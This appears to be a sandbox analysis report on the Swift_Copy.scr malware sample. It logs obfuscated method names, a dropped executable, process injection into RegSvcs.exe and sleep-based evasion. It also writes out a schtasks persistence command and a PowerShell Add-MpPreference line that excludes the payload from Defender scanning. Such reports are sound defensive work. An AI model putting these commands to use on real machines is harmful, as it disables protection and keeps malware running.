Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, QDgAGFdtSRBSfPJCn1.cs | High entropy of concatenated method names: 'kcDtCWUR7g', 'gO4t6M8XQm', 'YSNtZpJg3I', 'RgbtUJWenX', 'tactljKSWV', 'YM9tIkQjm1', 'hu4lQCpMYAFeWjmvvh', 'GgkEA3SuvkxFSvH6dW', 'Dpqttbr1wj', 'UcvtL6NFpx'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, TdsFnktLAE0UIQL9Kll.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GohnAgcyGk', 'zUYn9B4Gl6', 'll3ngCIjIX', 'gdXnQ9noIi', 'HrbnpyerDA', 'b6yn3UbXe9', 'byHnsXGvJs'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, VY2TOGBjwktYJOiewv.cs | High entropy of concatenated method names: 'EYXCHViqRH', 'n3oCPkVPYN', 'PohCMqWjwg', 'FG8Mq6DuGU', 'sOGMz090pE', 'HsBCv9djLX', 'afQCtRZovr', 'nASChQR5K3', 'A0ZCLrc8WH', 'bpbCdt2hic'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, S4xwiZ3nscacetp2TQ.cs | High entropy of concatenated method names: 'veQY2D155r', 'rVSYq1IyrV', 'EUU0vsJbEp', 'MEx0tf9x9y', 'z7GYxvKo61', 'DIXYafbdrx', 'TOdY8Sg18O', 'J5RYADJwjZ', 'rsQY9S57wR', 'BOWYgHA1AF'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, U8qtcs8WquS83p5A01.cs | High entropy of concatenated method names: 'kx4RJLdlJB', 'TI6RSnl4mv', 'iGgRuEhQP3', 'TTyRK59h2f', 'NQkR7GorQv', 'uaCRo9YP0j', 'OuqRBOXeX5', 'hKoRN6ThFW', 'L7NRywLmvJ', 'VLIRxP4XOc'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, EWVqM9ukQjm1kV60nE.cs | High entropy of concatenated method names: 'ulEMTCyJ0l', 'cbyMwXiuKW', 'OOIMWbCdYI', 'K32MCn2blC', 'qVdM6l1NUT', 'DRfWp6oXDF', 'YVhW3fgmA9', 'SdoWsgDapb', 'HpEW2WLo2d', 'swrW5m4Fn4'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, K5DXy25lGX8JHc3F1Z.cs | High entropy of concatenated method names: 'Q1i0uU4ELZ', 'W8X0K65x5u', 'ubr0VEmds7', 'tqH07iGYVA', 'y850A2Kb71', 'Pim0ondeTL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, x6J6dmtvU2KqcCPQUcW.cs | High entropy of concatenated method names: 's3gDOsdmU0', 'Mf1DfhO9jL', 'OfrDbHdJew', 'mGjD1AD9ta', 'JMIDGnHGH1', 'pLwD4b9xid', 'KMCDr6iZB6', 'cPHDJHis7f', 'MWUDSSSJcg', 'yt5DcR93q5'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, UTGQOOw6OPjkFM2VKM.cs | High entropy of concatenated method names: 'Dispose', 'df3t5pDVEJ', 'dabhKqCpq3', 'ztLXXaBGQC', 'asytqQdKok', 'Ps8tzedw2A', 'ProcessDialogKey', 'M4Ehv5DXy2', 'oGXht8JHc3', 'u1ZhhbWAq5'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, zWAq5ZqEQ70vicMem8.cs | High entropy of concatenated method names: 'bDhDtAoRry', 'iXcDLgX2Qe', 'imuDduMKjS', 'iG1DHQ2VSY', 'SOEDwhl32R', 'aevDWe95Ms', 'qqtDM7pXRP', 'nZS0sfOeLf', 'Ghd02EIkBg', 'vtO05shurH'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, WyQdKo2k8s8edw2Am4.cs | High entropy of concatenated method names: 'M5g0HvY5Jo', 'P1y0wUDnbU', 'dvk0PY4doH', 'xsm0WEsB4m', 'w5C0M4E7af', 'ATu0C1oETt', 'BJO06NNoYU', 'Bf90jEPu19', 'TsR0Zf77AT', 'mLW0UJqqnK'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, kS3cTkm997BAqLLlhG.cs | High entropy of concatenated method names: 'e68COBJJxb', 'kC3CfvZFui', 't32CbCClLD', 'sjoC1cRVrW', 'NldCGwbZhV', 'DPJC4rygJW', 'mB3CrLWMNh', 'B1aCJkFNYR', 'AjNCSruWK7', 'lvcCcSuOPd'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, kATSQ5QhDPFqb6YBF3.cs | High entropy of concatenated method names: 'r4QYZAgOol', 'gWNYUaeFdD', 'ToString', 'dj0YHq3pKn', 'gcDYwZ0jHv', 'k26YPGQ3sV', 'mFvYWApjp9', 'BJpYMYhfEW', 'AhPYCXHfrX', 'o3FY66pJiQ'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, bMka7RhLoveaww4eV3.cs | High entropy of concatenated method names: 'GdnbjhwsX', 'dli1qWP5J', 'dsD4hJJmH', 'DWZrgNwAm', 'eyLS3Osvu', 'jAic3HqgA', 'QBu22ubrL98C9t5CUw', 'xnDoEsyvAbqrxhFHnl', 'hrBw6BMy96TUSrQg3Z', 'LMH0vlYQ4'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, rWUR7gJwO4M8XQmEUW.cs | High entropy of concatenated method names: 'iViwAdi0yR', 'OVgw9wGUd5', 'fHKwgwx6Xq', 'lAXwQYxnfT', 'dNQwp1sHUS', 'svNw34fj8n', 'zGgwsfBXp2', 'SYZw2kKApi', 'oCMw52Eq84', 'se4wqxusAZ'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, DVKBuqSSNpJg3IAgbJ.cs | High entropy of concatenated method names: 'a9tP1EeW4Z', 'DfNP4C64Tj', 'AZwPJkEE2g', 'ebqPSNg5fL', 'q7TPljHZqk', 'SahPIjEEgK', 'XykPYdmksG', 'tNeP0TgUoJ', 'bPhPDBM7B9', 'vK2Pn5qVPT'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, Iy9Tgqz43IelUyKJXv.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iyNDRBdeES', 'bXiDlraGku', 'AyZDIqLrBK', 'paODYKfrha', 'IKbD0OXnJ8', 'GrhDDtI1bQ', 'Os3Dn7lMW4'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, g6SGhFPhI7nejp3SeQ.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XWoh5HTlKu', 'b7Bhqplfcg', 'NEPhzF3uoi', 'E8QLvdVfP5', 'Gy1Lt5VRoG', 'wxWLhsTcFO', 'sbALLkDgwr', 'SREYO779iyUWS4XCsJ8'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, EvkiPGgVYGUxUYNOdZ.cs | High entropy of concatenated method names: 'ToString', 'TZGIxAFmur', 'YVUIKhQ7Vm', 'L1UIVZZQCq', 'KUfI7jMNWw', 'EbqIok8YYt', 'h2PIEIv4dM', 'z5RIBJEBiB', 'y2HINVRIgW', 'JIlImJ1CXi'
Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, iwtTH6AbfoWbx1OhVT.cs | High entropy of concatenated method names: 'gVElySMNds', 'jLwlaxyBpQ', 't4wlACIiBD', 'K2hl9ktk1Q', 'fmFlKBlS96', 'IjklV8Kqcm', 'raBl7Geqts', 'LBWloLUxJb', 'kGIlEIKW2l', 'CBllB2Q3n5'
Source: C:\Users\user\Desktop\Swift_Copy.scr | File created: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe

Boot Survival

Source: C:\Users\user\Desktop\Swift_Copy.scr | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scr - Process information set: NOOPENFILEERRORBOX (47 occurrences)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process information set: NOOPENFILEERRORBOX (102 occurrences)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Process information set: NOOPENFILEERRORBOX (49 occurrences)
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe - Process information set: NOOPENFILEERRORBOX (45 occurrences)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match; File source: Process Memory Space: Swift_Copy.scr PID: 4592, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: WAuLmtFUmD.exe PID: 5960, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory allocated: 18E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory allocated: 33B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory allocated: 53B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory allocated: 9330000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory allocated: A330000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory allocated: A530000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory allocated: B530000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory allocated: BC50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory allocated: 1540000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory allocated: 3330000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory allocated: 18A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory allocated: 8B20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory allocated: 9B20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory allocated: 9D00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory allocated: AD00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory allocated: B3F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory allocated: C3F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory allocated: D3F0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 7705
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1947
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Window / User API: threadDelayed 710
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Window / User API: threadDelayed 1879
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Window / User API: threadDelayed 1841
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Window / User API: threadDelayed 7817
                    Source: C:\Users\user\Desktop\Swift_Copy.scr TID: 4308; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5832; Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6132; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe TID: 1772; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99869
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99530
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98853
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99649
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99326
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99215
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98752
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98405
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98295
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98187
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98066
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97835
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97622
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97475
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97374
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97265
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96936
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96811
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96593
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96374
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96265
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 95937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 95827
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 95603
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 95500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 95390
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 95281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 94110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 93956
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 93828
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 93718
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 93609
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 93500
                    Source: RegSvcs.exe, 00000007.00000002.2124233403.0000000005BD2000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAN Miniport (Network Monitor)-QoS Packet Scheduler-0000-
                    Source: RegSvcs.exe, 0000000C.00000002.3284308297.00000000061EA000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:\bb
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe"
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43C000
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 652008
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43C000
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CFE008
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp"
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp"
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Queries volume information: C:\Users\user\Desktop\Swift_Copy.scr VolumeInformation
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Swift_Copy.scr; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
